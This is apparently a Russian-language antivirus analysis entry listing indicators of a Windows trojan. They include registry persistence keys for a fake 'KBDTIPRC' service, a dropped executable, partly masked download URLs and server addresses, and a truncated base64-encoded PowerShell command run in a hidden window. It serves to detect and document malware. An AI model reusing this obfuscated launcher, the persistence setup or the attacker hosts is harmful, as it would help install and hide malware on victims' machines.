Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDTIPRC] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDTIPRC] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData004a\KBDTIPRC.exe"'
- 'KBDTIPRC' "%WINDIR%\SysWOW64\NlsData004a\KBDTIPRC.exe"
- 'KBDTIPRC' %WINDIR%\SysWOW64\NlsData004a\KBDTIPRC.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEoAUgBVAFYAegBhAHUAPQAnAE8ATABMAEUASgBiAG0AZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIAYABJAHQAWQBgAFAAcgBvAHQAbwBDAG8AbAAiACAAPQAgAC...
- %HOMEPATH%\868.exe
- %WINDIR%\syswow64\nlsdata004a\kbdtiprc.exe
- %HOMEPATH%\868.exe в %WINDIR%\syswow64\nlsdata004a\kbdtiprc.exe
- '20#.#35.10.215':80
- http://bi###oud.com/picaboud/images/4k9w0176085/
- http://20#.#35.10.215/Q1bGUWsDAzPEDUkOsI0/jFWOl1PQieVqIBJ28Ni/1RRFHiUcDsT/H5tWs1tMqpFPa/SHF5i9zccU/fvDxuY/
- DNS ASK bi###oud.com
- '%HOMEPATH%\868.exe'
- '%WINDIR%\syswow64\nlsdata004a\kbdtiprc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEoAUgBVAFYAegBhAHUAPQAnAE8ATABMAEUASgBiAG0AZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIAYABJAHQAWQBgAFAAcgBvAHQAbwBDAG8AbAAiACAAPQAgAC...' (со скрытым окном)